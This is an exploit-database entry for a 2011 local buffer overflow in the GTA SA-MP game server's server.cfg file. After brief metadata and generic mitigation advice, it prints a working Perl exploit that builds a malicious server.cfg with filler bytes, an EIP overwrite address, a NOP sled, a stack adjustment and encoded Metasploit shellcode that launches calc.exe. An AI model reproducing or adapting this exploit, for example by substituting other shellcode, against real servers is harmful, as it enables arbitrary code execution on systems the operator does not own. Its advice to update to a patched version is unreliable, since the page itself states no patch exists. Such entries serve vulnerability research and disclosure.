GTA SA-MP server.cfg Local Buffer Overflow Vulnerability

vendor:

Grand Theft Auto: SA-MP

by:

Silent_Dream

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Grand Theft Auto: SA-MP

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:rockstargames:grand_theft_auto:sa-mp

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3, Windows 7

2011

GTA SA-MP server.cfg Local Buffer Overflow Vulnerability

This exploit takes advantage of a buffer overflow vulnerability in the server.cfg file of the GTA SA-MP game server. By overwriting the file with a specially crafted payload, an attacker can execute arbitrary code on the server. The exploit uses an EIP overwrite technique and has a maximum payload space of 392 bytes. There are 3 bad characters: 0x1a, 0x0d, 0x0a. Triggering the exploit will cause the server to crash and launch the Windows calculator. The exploit has been tested on Windows XP SP3 and Windows 7.

Mitigation:

To mitigate this vulnerability, it is recommended to update the GTA SA-MP game server software to a patched version that addresses the buffer overflow issue. Additionally, it is important to regularly apply security updates and patches to the server's operating system to minimize the risk of exploitation.

Source

Exploit-DB raw data:

# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)
# Date: 9-26-11
# Author: Silent_Dream
# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip
# Tested on: XP SP3, Windows 7
# Thanks to: corelanc0d3r & team, Metasploit, Exploit-db.

#No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead.
#392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a.

#Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator!

my $file = "server.cfg"; #file must be named server.cfg for bug to trigger.
my $head = "echo "; #probably not needed, tweak if you want.
my $junk = "\x41" x 379;
my $eip = "\xaa\x9f\x42\x00"; #push esp/ret in samp-server.exe
my $nops = "\x90" x 12;
my $adjust = "\x81\xc4\x54\xf2\xff\xff"; #add esp, -3500

my $shellcode =
#x86/shikata_ga_nai succeeded with size 227 (iteration=1) 
#Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a' 

"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" .
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" .
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" .
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" .
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" .
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" .
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" .
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" .
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" .
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" .
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" .
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" .
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" .
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" .
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" .
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" .
"\x5e\xa4\xb4";

open($File, ">$file");
print $File $head.$junk.$eip.$nops.$adjust.$shellcode;
close($FILE);